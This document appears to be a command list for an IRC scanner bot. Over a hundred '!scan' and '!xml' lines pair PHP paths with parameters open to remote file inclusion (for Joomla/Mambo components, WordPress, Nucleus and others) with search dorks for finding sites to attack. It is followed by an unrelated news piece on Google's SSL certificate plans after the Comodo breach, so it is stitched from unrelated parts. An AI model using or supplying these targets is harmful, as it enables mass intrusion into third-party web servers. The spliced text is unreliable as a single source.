!scan /includes/functions_common.php/modules/vwar/admin/admin.php?vwar_root= Powered by: Virtual War v1.5.0, Copyright © 2001 - 2004, vwar
!scan /filemanager/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]= "/filemanager"
!scan /filemanager/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]= "ispCP Omega"
!scan /filemanager/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]= "/skins" "/skins"
!scan /includes/tgpinc.php?DOCUMENT_ROOT= "/includes/tgpinc.php"
!scan /includes/tgpinc.php?DOCUMENT_ROOT= "Gnat-TGP" "Gnat-TGP"
!scan /includes/tgpinc.php?DOCUMENT_ROOT= "/tgpinc" "/tgpinc"
!scan /Wiky/include/WBmap.php?langFile= "/WBmap" "/WBmap"
!scan /Wiky/include/WBmap.php?langFile= "/Wiky" "/Wiky"
!scan /_center.php?page= "ProMan" "ProMan"
!scan /home.php?pg= "/home.php?pg="
!scan /linkadmin.php?page= "/linkadmin.php"
!scan /nullpo/hsList.php?subdir= "/nullpo"
!scan /index.php?version= "/index.php?version="
!scan /board.php?code= "/board" "/board"
!scan /index.php?pid= "/index.php?pid="
!scan /index.php?opt= "/index.php?opt="
!scan /myevent.php?myevent_path= "/myevent.php"
!scan /Decoder.php?base_dir= "phpsyncml"
!scan /adm/krgourl.php?DOCUMENT_ROOT= "/adm" "/adm"
!scan /admin/modules/blocks.php?spaw_root= "/modules" "/modules"
!scan /rss_importer_functions.php?sitepath= "AdaptCMS" "AdaptCMS"
!scan /components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]= "/com_ezine" "/com_ezine"
!scan /admin/popup.php?popup= admin/popup.php
!scan /microcms/includes/file_manager/special.php?fm_includes_special= "MAXcms" "MAXcms"
!scan /CoupleDB.php?Parametre=0&DataDirectory= "PHPGenealogy" "PHPGenealogy"
!scan /libraries/database.php?path= "efront" "efront"
!scan /components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]= "/com_ajaxchat" "/com_ajaxchat"
!scan /administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path= "/com_booklibrary" "/com_booklibrary"
!scan /debugger.php?config_atkroot= "Achievo" "Achievo"
!scan /bulletin//skin/pqbig_board_blue/login.php?dir= "/skin" "/skin"
!scan /components/com_mamboman/mamboman.html.php?mosConfig_absolute_path= "/com_mamboman" "/com_mamboman"
!scan /biblioteca/bib_form.php?CLASSPATH= "FreeSchool"
!scan /biblioteca/bib_form.php?CLASSPATH= "/biblioteca"
!scan /plugins/address/admin/index.php?GLOBALS[config][dir][plugins]= "PHPope"
!scan /engine/api/api.class.php?dle_config_api= "DatalifeEngine"
!scan /engine/api/api.class.php?dle_config_api= "/api" "/api"
!scan /tools/send_reminders.php?noSet=0&includedir= "WebCalendar v1.1.0c-CVS"
!scan SSI.php?sourcedir= "/forum/index.php?sourcedir="
!scan /admin/common.inc.php?base_path= "pollphp" "textfile"
!scan /includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root= "/vwar"
!scan /index.php?page= "/index.php?page=faq"
!scan /index.php?sec= "/index.php?sec=faq"
!scan /components/com_moofaq/includes/file_includer.php?gzip=0&file= "/com_moofaq"
!scan /skin/ggambo7002_board/write.php?dir= "1999-2009 Zeroboard / skin by ggambo"
!scan ?APB_rp= "ApBoard"
!scan /includes/pear/Mail/RFC822.php?CONFIG[pear_dir]= "V-webmail"
!scan /forum/include/common.php?pun_root= "/forum"
!scan /dm-albums/template/album.php?SECURITY_FILE= "/dm-albums"
!scan /wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript= "WordPress"
!scan /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path= "/com_fabrik" "/com_fabrik"
!scan /com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path= "/com_realestatemanager"
!scan /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path= "/com_vehiclemanager"
!scan /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path= "browse/category_id,2"
!scan /components/com_virtuemart/errors.php?error= "browse/category_id,2"
!scan /errors.php?error= "browse/category_id,2"
!scan /_theme/breadcrumb.php?rootBase= "! Hide Your Friends & Comments"
!scan /errors.php?error= "erstellt mit PHPKIT"
!scan es_custom_menu.php?files_dir= Weblogicnet
!scan components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path= "/com_virtuemart" "/com_virtuemart"
!scan /?_PHPLIB[libdir]= /?_PHPLIB[libdir]=
!scan ?INC= "If You lost password enter Your login:"
!scan /ckshop.php?incdir= "Payment options"
!scan /accounts/inc/errors.php?error= "Powered By: Merak Mail Server Software"
!scan ?_SERVER[DOCUMENT_ROOT]= "Powered by Bitrix Site Manager nulled by Nosferatu"
!scan ?dir[func]=&dir[base]= "ladder scripts"
!scan /errors.php?error= "/option,com"+"Joomla"
!scan /errors.php?error= "/option,com"+"Mambo"
!scan /errors.php?error= "/shop/index.php"
!scan /yacs/scripts/update_trailer.php?context[path_to_root]= "/yacs"
!scan errors.php?error= /ea-gBook /ea-gBook
!scan /ea-gBook/index_inc.php?inc_ordner= "/ea-gBook"
!scan appserv/main.php?appserv_root= "Index of /appserv"
!scan /includes/class_item.php?fileExtension= login.php?redirect=auction_details.php?auction_id=
!scan /include/footer.php?_path[counter]= RGBoard
!scan /latest/sirini_gallery_latest/list.php?path= GRBoard
!scan /include.php?grboard= GRBoard
!scan 179_squarebox_pds_list/view.php?theme= GRBoard
!scan /_conf/core/common-tpl-vars.php?confdir= PHPmyGallery
!scan ///////?cmd&file= "List Users with Pics only?"
!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= "/snippets" "/snippets"
!scan //ray/modules/global/inc/header.inc.php?sIncPath= %22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22
!scan /include/scripts/export_batch.inc.php?DIR= "/ModernBill" "/ModernBill"
!scan calogic/clmcpreload.php?CLPATH= "/calogic"
!scan /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act= kboard
!scan cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP= cowadmin
!scan /adminhead.php?path[docroot]= "/adminhead.php"
!scan /include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site= "phpkit"
!scan ?custompluginfile[]= index.php?categoryid=5
!scan ?custompluginfile[]= index.php?categoryid=10
!scan ?custompluginfile[]= index.php?categoryid=15
!scan index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path= %22%2Fincludes%2Fjoomla.php%22
!scan /tiny_includes/config.php?dir_ws= "/tiny_includes"
!scan /index.php?file_op= "RPortal"
!scan /common/theme/default/header_setup.php?path[docroot]= "Events Calendar"
!scan cmpro_header.inc.php?sitepath= "cmpro.ext"
!scan errors.php?error= "Miro International Pty Ltd."
!scan ?REX[INCLUDE_PATH]= "redaxo"
!scan /?view=page&pagename= /?view=selectcity&targetview=1
!scan /coast/header.php?sections_file= "/coast"
!scan errors.php?error= "/barcodegen"
!scan /class/LSTable.php?class_dir= "/barcodegen"
!scan /mwchat/libs/errors.php?error= "/mwchat"
!scan /modules/mods_full/shopping_cart/includes/errors.php?error= "/shopping_cart"
!scan /modules/My_eGallery/errors.php?error= "/My_eGallery"
!scan /tools/errors.php?error= "includes/php-dbi.php"
!scan /includes/mailaccess/errors.php?error= "/mailaccess"
!scan /include/monitoring/engine/errors.php?error= "MakeXML4statusCounter"
!scan /ecommerce/payment/errors.php?error= "/ecommerce"
!scan /mambots/content/multithumb/errors.php?error= "/content/multithumb"
!scan /frame.php?framefile= "/frame.php"
!scan /frame.php?framefile= "Ol Bookmarks Manager"
!scan errors.php?error= "/extcalendar" "/extcalendar"
!scan includes/session.php?baseDir= "Version 2.0.4 "You must have cookies enabled in your browser"
!scan errors.php?error= "/com_philaform" "/com_philaform"
!scan /_theme/breadcrumb.php?rootBase= "! Hide Your Friends & Comments"
!scan /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]= "CMS Contenido"
!scan include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site= "Diese Webseite wurde mit PHPKIT Version 1.6.1 erstellt"
!scan index.php?ac= "index.php?ac="
!scan index.php?mod= "index.php?mod="
!scan /includes/function_core.php?web_root= "This search engine is in no way intended for illegal downloads."
!scan /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path= "/skin_shop"
!scan contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]= cms/front_content
!scan /modules/Forums/admin/admin_users.php?phpbb_root_path= "%22PHP-Nuke+Port+by+Tom+Nitzschner%22"
!scan /page.php?id= "/page.php?id="
!scan /modules/Forums/admin/errors.php?error= "modules.php?name="
!scan /poll/poll_ssi.php?include_path= "poll_ssi.php"

Bug Dork XML

!xml active/components/xmlrpc/client.php?c[components]= /Pindorama/
!xml /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= "com_sitemap"
!xml /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= "com_videodb"
!xml /ch_readalso.php?read_xml_include= "Copyrights ? 2005 Belgische Federale Overheidsdiensten"
!xml /include/monitoring/engine/MakeXML.php?fileOreonConf= "oreon.conf.php"
!xml /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf= "common-Func-ACL.php"
!xml /sitemap.xml.php?dir[classes]= "class.pages.php"
!xml xmlrpc.php "a web portal system written in PHP."
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP"
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP" "powered by wordpress"
!xml xmlrpc.php RSS 2.0 * Comments RSS 2.0
!xml xmlrpc.php "WordPress Module * WordPress ME * WordPress"
!xml /nucleus/xmlrpc/server.php "Nucleus CMS v3.2 * Valid XHTML"
!xml serendipity_xmlrpc.php "Welcome to the Serendipity Administration Suite"
!xml /nucleus/xmlrpc/server.php "2003-2004, Radek Hulán"
!xml tiki-xmlrpc_services.php tiki-*.php
!xml xmlrpc.php "[ * powered by b2 * ]"
!xml xmlrpc.php /b2-include/xmlrpcs.inc on line 182
!xml /xmlsrv/xmlrpc.php /b2evocore/_functions_xmlrpcs.php on line 1
!xml xmlrpc.php wp-includes/class-xmlrpcs.php on line 255
!xml serendipity_xmlrpc.php "Powered by Serendipity"
!xml serendipity_xmlrpc.php "Open login screen"
!xml /b2/xmlsrv/xmlrpc.php "powered by b2"
!xml /nucleus/xmlrpc/server.php "Nucleus"
!xml /nucleus/xmlrpc/server.php "index.php?blogid="
!xml /nucleus/xmlrpc/server.php "The Nucleus Group"
!xml /xmlsrv/xmlrpc.php 'index.php?blog='
!xml /nucleus/xmlrpc/server.php 'index.php?catid=' + blogid
!xml /nucleus/xmlrpc/server.php 'index.php?itemid='
!xml xmlrpc.php "This web site was made with PostNuke"
!xml xmlrpc.php "Web site powered by PostNuke"
!xml /faq/xmlrpc.php "powered by phpmyFAQ"
!xml xmlrpc.php "by the Tiki community"
!xml phpgroupware/xmlrpc.php "This Site is powered by phpWebSite"
!xml xmlrpc.php "This website is powered by eGroupWare's"
!xml xmlrpc.php "This website is powered by WordPress"
!xml adxmlrpc.php "phpAdsNew"
!xml xmlrpc.php "by each individual author, All Rights Reserved"
!xml /xmlrpc.php /amfx
!xml /amfx/xmlrpc.php "BlazeDS"
!xml /amfx/xmlrpc.php "anything"
!xml /xmlrpc.php dev-php/PEAR-XML_RPC
!xml xmlrpc.php "PEAR-XML_RPC"
!xml xmlrpc.php "phpxmlrpc"
!xml xmlrpc.php "/PEAR-XML_RPC"
!xml xmlrpc.php "/pear"
!xml xmlrpc.php "/SRPMS"
!xml xmlrpc.php "/php-pear"
!xml xmlrpc.php "phpMyFAQ"
!xml xmlrpc.php "PHPXMLRPC"
!xml xmlrpc.php "Trustix"
!xml xmlrpc.php "Strayhorn"
!xml /xmlrpc.php /modules.php?op=modload
!xml /xmlrpc.php Valid XHTML 1.0! Valid CSS! Valid RSS! Valid Atom!
!xml /xmlsrv/xmlrpc.php/xmlsrv/xmlrpc.php /wp-includes* WordPress ME *
!xml /xmlsrv/xmlrpc.php/xmlsrv/xmlrpc.php /wp-includes+wordpress
!xml /xmlsrv/xmlrpc.php "Valid XHTML 1.0! Valid CSS! Valid RSS! Valid Atom"
!xml /xmlsrv/xmlrpc.php "Original template design by François PLANQUE."
!xml /xmlsrv/xmlrpc.php "Original template design by Free CSS Templates"
!xml /xmlrpc.php "XML-RPC library"
!xml /pingserver.php /pMachine+pnSession+pmserver+pm
!xml /pingserver.php /pMachine+pm
!xml /pingserver.php /pMachine+index.php
!xml /pingserver.php /pMachine,pMachine
!xml /xmlrpc.php /include+phpMyFAQ
!xml /xmlrpc.php TikiWiki+utils.php
!xml /xmlrpc.php powered+by+postnuke
!xml /xmlrpc.php "BLOG:CMS"
!xml /xmlrpc.php "faultString XML error: no element found at line 1"
!xml /xmlrpc.php "PEAR XML_RPC"
!xml /xmlrpc.php "Xoops"
!xml /xmlsrv/xmlrpc.php "Original template design by François PLANQUE."
!xml /xmlrpc.php "postnuke"
!xml /xmlrpc.php "dailyblog"
!xml /xmlrpc.php phpgroupware
!xml /xmlphp.php "XML-RPC for PHP"
!xml /nucleus/xmlrpc.php Nucleus © 2002-2004 The Nucleus Group - Donate!
!xml /drupal/xmlrpc.php callback
!xml /nucleus/xmlrpc/server.php Nucleus © 2002-2004 The Nucleus Group - Donate!
!xml /xmlrpc.php "Squirrelcart"
!xml /xmlrpc.php "Powered By Wordpress"
!xml /xmlrpc.php RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP
!xml /xmlrpc.php "com_pollxt"
!xml /adxmlrpc.php /phpAdsNew/ site:.it
!xml /xmlrpc.php "action"+"poll_ident"
!xml /xmlrpc.php "webcalendar"
!xml /WordPress WordPress 1.2.1
!xml /b2/xmlsrv/xmlrpc.php /b2+site:.it
!xml /b2evo/xmlsrv/xmlrpc.php /b2evo+site:.it
!xml /blog/xmlrpc.php /blog+site:.it
!xml /blog/xmlsrv/xmlrpc.php /blog+site:.it
!xml /blogs/xmlrpc.php /blogs+site:.it
!xml /blogs/xmlsrv/xmlrpc.php /blogs+site:.it
!xml /blogtest/xmlsrv/xmlrpc.php /blogtest+site:.it
!xml xmlrpc.php "a web portal system written in PHP."
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP"
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP" "powered by wordpress"
!xml xmlrpc.php RSS 2.0 * Comments RSS 2.0
!xml xmlrpc.php "WordPress Module * WordPress ME * WordPress"
!xml /nucleus/xmlrpc/server.php "Nucleus CMS v3.2 * Valid XHTML"
!xml serendipity_xmlrpc.php "Welcome to the Serendipity Administration Suite"
!xml xmlrpc.php "WordPress Module * WordPress ME * WordPress"
!xml serendipity_xmlrpc.php "Powered by. Serendipity PHP Weblog"
!xml /nucleus/xmlrpc/server.php "2003-2004, Radek Hulán"
!xml tiki-xmlrpc_services.php tiki-*.php
!xml xmlrpc.php "[ * powered by b2 * ]"
!xml xmlrpc.php /b2-include/xmlrpcs.inc on line 182
!xml /xmlsrv/xmlrpc.php /blogs/b2evocore/_functions.php
!xml /xmlsrv/xmlrpc.php /b2evocore/_functions.php
!xml /xmlsrv/xmlrpc.php /b2evocore/_functions_xmlrpcs.php on line 1
!xml xmlrpc.php wp-includes/class-xmlrpcs.php on line 255
!xml serendipity_xmlrpc.php "Powered by Serendipity"
!xml serendipity_xmlrpc.php "Open login screen"
!xml /b2/xmlsrv/xmlrpc.php "powered by b2"
!xml /nucleus/xmlrpc/server.php "Nucleus" site:it
!xml /nucleus/xmlrpc/server.php "index.php?blogid=" site:.it
!xml /nucleus/xmlrpc/server.php "The Nucleus Group" site:.it
!xml /xmlsrv/xmlrpc.php 'index.php?blog='
!xml /nucleus/xmlrpc/server.php 'index.php?catid=' + blogid
!xml /nucleus/xmlrpc/server.php 'index.php?itemid='
!xml xmlrpc.php "This web site was made with PostNuke"
!xml xmlrpc.php "Web site powered by PostNuke"
!xml /faq/xmlrpc.php "powered by phpmyFAQ"
!xml /faq/xmlrpc.php "/index.php?p=faq"
!xml /faq/xmlrpc.php "/index.php?pg=faq"
!xml /faq/xmlrpc.php "/index.php?pag=faq"
!xml /faq/xmlrpc.php "/index.php?page=faq"
!xml /faq/xmlrpc.php "/?faq"
!xml xmlrpc.php "by the Tiki community"
!xml phpgroupware/xmlrpc.php "This Site is powered by phpWebSite"
!xml xmlrpc.php "This website is powered by eGroupWare's"
!xml xmlrpc.php "This website is powered by WordPress"
!xml adxmlrpc.php "phpAdsNew"
!xml xmlrpc.php "by each individual author, All Rights Reserved"

Google Unveils SSL Security Plans

As the security industry attempts to move on from the Comodo security breach, Google is shedding light on its plans for securing secure socket layer (SSL) certificates.

In a posting to the Google Online Security blog, security team engineer Ben Laurie outlined plans for a pair of projects which the company hopes will help to prevent future security incidents and restore user trust in online certificates.

The first project is an online catalogue for certificates. Laurie explained that the company is using its web crawling software to pore over sites and gather information on security certificates.

The company plans to turn the collection into the Google Certificate Catalog, a service which will function as a database of SSL certificates, allowing for connections to verify the authenticity of online certificate data.

In addition to the database, Google said that it would be working with the DNS-based Authentication of Named Entries (DANE) working group. The group is working to build a platform which can specify and validate the signing on online certificates.

“In the wake of the recent Comodo fraud incident, there has been a great deal of speculation about how to improve the public key infrastructure, on which the security of the Internet rests,” Laurie wrote

“Unfortunately, this isn’t a problem that will be fixed overnight.”

Laurie was referring to the recent crisis with security firm Comodo in which a hacker was able to gain access to company data and then use the information to generate fake security certificates.

A hacker from Iran later claimed responsibility for the attacks.